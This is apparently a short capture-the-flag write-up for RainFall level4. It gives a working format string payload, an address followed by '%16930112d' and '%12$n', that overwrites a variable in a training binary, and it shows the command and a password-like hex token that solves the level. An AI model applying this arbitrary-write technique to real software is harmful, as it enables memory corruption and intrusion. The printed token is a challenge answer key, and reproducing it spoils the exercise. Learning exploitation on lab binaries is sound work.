As in the previous level, the program flaw remains the same

This time if M = 0x1025544 (16930116) this enters the condition which will display the level 5 pass

We cannot do as before, because the payload is protected and is limited

The steps to know the address of M and the address of the input remain the same


Our payload begins with the target address (\x10\x98\x04\x08) followed by padding ("%16930112d") to reach the required offset. Finally, we use "%12$n" to write the number of printed characters to the specified address

python -c 'print "\x10\x98\x04\x08" + "%16930112d" + "%12$n"' | ./level4

level3@RainFall:~$ (python -c 'print "\x10\x98\x04\x08" + "%16930112d" + "%12$n"' ; cat) | ./level4
[...]
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a
